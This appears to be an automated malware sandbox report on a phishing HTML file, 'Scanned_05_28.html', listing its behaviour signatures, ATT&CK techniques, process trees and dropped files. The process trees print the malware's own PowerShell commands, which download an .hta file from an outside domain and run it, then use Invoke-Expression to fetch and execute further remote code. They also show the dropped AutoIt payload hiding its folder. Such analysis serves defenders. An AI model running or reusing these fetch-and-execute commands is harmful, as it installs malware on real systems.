f9afc9391e19fe827dff90b01456fdc0d4915cefe2b5d76aabc7f82c2967049a

Analysis

max time kernel
299s
max time network
298s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
28/05/2024, 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Scanned_05_28.html
Size

8KB
MD5

504e984271e9ba573fd67de5583df8bc
SHA1

172a92868d1339086ba9dacd7a80caba2b0980eb
SHA256

f9afc9391e19fe827dff90b01456fdc0d4915cefe2b5d76aabc7f82c2967049a
SHA512

657c681d176800029cc9c90bf534f6038d3b842878bc5635179e9753d3304dd973415db8ac37a718729a57cbea7cb598c50006854137af99b5e23405e2ce6612
SSDEEP

96:MhvvIFO2B40aPMfiWTMFSCH+PGy9MgC3/mGlby3Pnwp0tUNAkacVjS0gGi/Di53:MGZEhLqMgEOG4/nw+CWvY6Gi/Di5

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 9 IoCs

flow	pid	Process
14	3948	powershell.exe
17	1120	powershell.exe
18	1120	powershell.exe
20	5064	powershell.exe
21	1708	powershell.exe
22	1708	powershell.exe
23	4656	powershell.exe
24	4300	powershell.exe
25	4300	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3948	powershell.exe
5064	powershell.exe
4656	powershell.exe
1120	powershell.exe
1708	powershell.exe
4300	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
4704	Autoit3.exe
1336	Autoit3.exe
4384	Autoit3.exe

Command and Scripting Interpreter: AutoIT 1 TTPs 3 IoCs

Using AutoIT for possible automate script.

execution

AutoHotKey & AutoIT

T1059.010

pid	Process
4704	Autoit3.exe
1336	Autoit3.exe
4384	Autoit3.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	chrome.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133613827898919103"	chrome.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
3368	chrome.exe
3368	chrome.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
1120	powershell.exe
1120	powershell.exe
1120	powershell.exe
1120	powershell.exe
4704	Autoit3.exe
4704	Autoit3.exe
5064	powershell.exe
5064	powershell.exe
5064	powershell.exe
5064	powershell.exe
1708	powershell.exe
1708	powershell.exe
1708	powershell.exe
1708	powershell.exe
1336	Autoit3.exe
1336	Autoit3.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4300	powershell.exe
4300	powershell.exe
4300	powershell.exe
4300	powershell.exe
4384	Autoit3.exe
4384	Autoit3.exe
2312	chrome.exe
2312	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeDebugPrivilege	3948	powershell.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeCreatePagefilePrivilege	3368	chrome.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe
3368	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3368 wrote to memory of 2356	3368	chrome.exe	73
PID 3368 wrote to memory of 2356	3368	chrome.exe	73
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 4764	3368	chrome.exe	75
PID 3368 wrote to memory of 1044	3368	chrome.exe	76
PID 3368 wrote to memory of 1044	3368	chrome.exe	76
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77
PID 3368 wrote to memory of 224	3368	chrome.exe	77

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1336	attrib.exe
3320	attrib.exe
2900	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\Scanned_05_28.html
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xac,0xb0,0xd4,0xa8,0xd8,0x7ff965119758,0x7ff965119768,0x7ff965119778
  2⤵
  PID:2356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:2
  2⤵
  PID:4764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:8
  2⤵
  PID:1044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2036 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:8
  2⤵
  PID:224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2824 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:1
  2⤵
  PID:2284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2832 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:1
  2⤵
  PID:2236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3788 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:8
  2⤵
  PID:4040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:8
  2⤵
  PID:4236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:8
  2⤵
  PID:4172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5540 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:1
  2⤵
  PID:1220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:8
  2⤵
  PID:3856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:8
  2⤵
  PID:3944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3108 --field-trial-handle=1900,i,9538929337513652906,10429057551204729280,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2312

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1432

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min powershell invoke-webrequest -uri https://lashakhazhalia86dancer.com/c.txt -outfile c:\users\public\default.hta; start-process c:\users\public\default.hta;
1⤵
PID:4740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell invoke-webrequest -uri https://lashakhazhalia86dancer.com/c.txt -outfile c:\users\public\default.hta; start-process c:\users\public\default.hta;
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3948
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\default.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    PID:952
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'languangjob.com/wogyusxs')
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1120
    - - C:\owsa\Autoit3.exe
        
        "C:\owsa\Autoit3.exe" script.a3x
        5⤵
        Executes dropped EXE
        Command and Scripting Interpreter: AutoIT
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4704
      - \??\c:\windows\SysWOW64\cmd.exe
        
        "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\adcfebk\ffkdbab
        6⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic ComputerSystem get domain
        7⤵
        
        PID:2812
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\system32\attrib.exe" +h C:/owsa/
        5⤵
        Views/modifies file attributes
        
        PID:1336

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min powershell invoke-webrequest -uri https://lashakhazhalia86dancer.com/c.txt -outfile c:\users\public\default.hta; start-process c:\users\public\default.hta;
1⤵
PID:1048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell invoke-webrequest -uri https://lashakhazhalia86dancer.com/c.txt -outfile c:\users\public\default.hta; start-process c:\users\public\default.hta;
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:5064
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\default.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    PID:2436
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'languangjob.com/wogyusxs')
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1708
    - - C:\owsa\Autoit3.exe
        
        "C:\owsa\Autoit3.exe" script.a3x
        5⤵
        Executes dropped EXE
        Command and Scripting Interpreter: AutoIT
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1336
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\system32\attrib.exe" +h C:/owsa/
        5⤵
        Views/modifies file attributes
        
        PID:3320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min powershell invoke-webrequest -uri https://lashakhazhalia86dancer.com/c.txt -outfile c:\users\public\default.hta; start-process c:\users\public\default.hta
1⤵
PID:5012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell invoke-webrequest -uri https://lashakhazhalia86dancer.com/c.txt -outfile c:\users\public\default.hta; start-process c:\users\public\default.hta
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:4656
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\default.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    PID:4976
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'languangjob.com/wogyusxs')
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4300
    - - C:\owsa\Autoit3.exe
        
        "C:\owsa\Autoit3.exe" script.a3x
        5⤵
        Executes dropped EXE
        Command and Scripting Interpreter: AutoIT
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4384
    - - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\system32\attrib.exe" +h C:/owsa/
        5⤵
        Views/modifies file attributes
        
        PID:2900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

AutoHotKey & AutoIT

T1059.010

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\adcfebk\ffkdbab

Filesize
54B

MD5
c8bbad190eaaa9755c8dfb1573984d81

SHA1
17ad91294403223fde66f687450545a2bad72af5

SHA256
7f136265128b7175fb67024a6ddd7524586b025725a878c07d76a9d8ad3dc2ac

SHA512
05f02cf90969b7b9a2de39eecdf810a1835325e7c83ffe81388c9866c6f79be6cdc8617f606a8fedc6affe6127bede4b143106a90289bbb9bf61d94c648059df

Download Submit
C:\ProgramData\adcfebk\kcdffff

Filesize
1KB

MD5
a90a3df8d4aa227be276065cd2215125

SHA1
11e248d1c0c090db16d4edd931fbb3cec904c4de

SHA256
4009695eb9b19430dc2fc193914bb623e305acd5f4a78a7de73e481d89d72b0d

SHA512
f3ac89eae51a92596e174bcd0738b802ac9418ec58533559cb46091181a8eef176c7bf3377fefaa5e382c6df71243f963e1075773b7a1f3b6f414ac3c94372ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
30KB

MD5
823e51bbeae22aa43f3b147d2ee6f526

SHA1
34bd9bda458432a5a2dc13ec5634437dfa1bd698

SHA256
5d98a65e725425bdea4c90f0938f5059a44a44d9406b8212a0ea31f326515475

SHA512
175ed996ddd67868b313f6b26f97b0085955a781c356b6d4a710e0fd269f5c23ec99e28bc538a0ab5921b04811968cc3b0bbd22d2be6d53640ca8acaa2d939fe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
627B

MD5
f9341e415d90ff652a5cd5fb75dabca8

SHA1
83e05a7da7237b4bb67ee933cffe919999f40f66

SHA256
5ceb4ef4709b0b6681a133a7f7d668a35dcd8792d3aa7feb0cd05ad38ff8bba9

SHA512
3a788f44448d9d748580b0dcecd2355e72c2e05f231caf0cbaee9e22a4445173fff52e34443dc6fbdabf618eaf6123986384f4816ae64219eecd43ee7642cf08

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
e757b70410ed3f9abd688afa82cad357

SHA1
14ef74e0d7bffd47c336d54e55e374d694489390

SHA256
db7fb5a85570bbc8c5ce57597e16c58c25bb4f3651046f4be3b5fc8f9800a49a

SHA512
c2ab128b8e8406548cfd987cff32be79c71b4c143f364672206922fc729912426f579e77030e6c37c32cbd06b289844ca05b354c057f520eee7798a22743cd4e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
318ad65c19a78caa4c6264827304a6dd

SHA1
3f21e223d483ef3fd024c77e53adea8a44e05816

SHA256
618f94cc6ba3782df10ba723db65b7d7dee34fe7b68448ef978d7b42634ec6ca

SHA512
d2083ad28283cdf5df4fc5d3ee4f0708127eb0017b4a6058cb02eec03bb4144e1bafa02636b68d608b76a812aef7fd1c50f70b32e555f5d878a7063774954f08

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
0533d28dde34e414501ab5091e7d8582

SHA1
2141c1774a7523cf9224ab6b21fe244685fa3c00

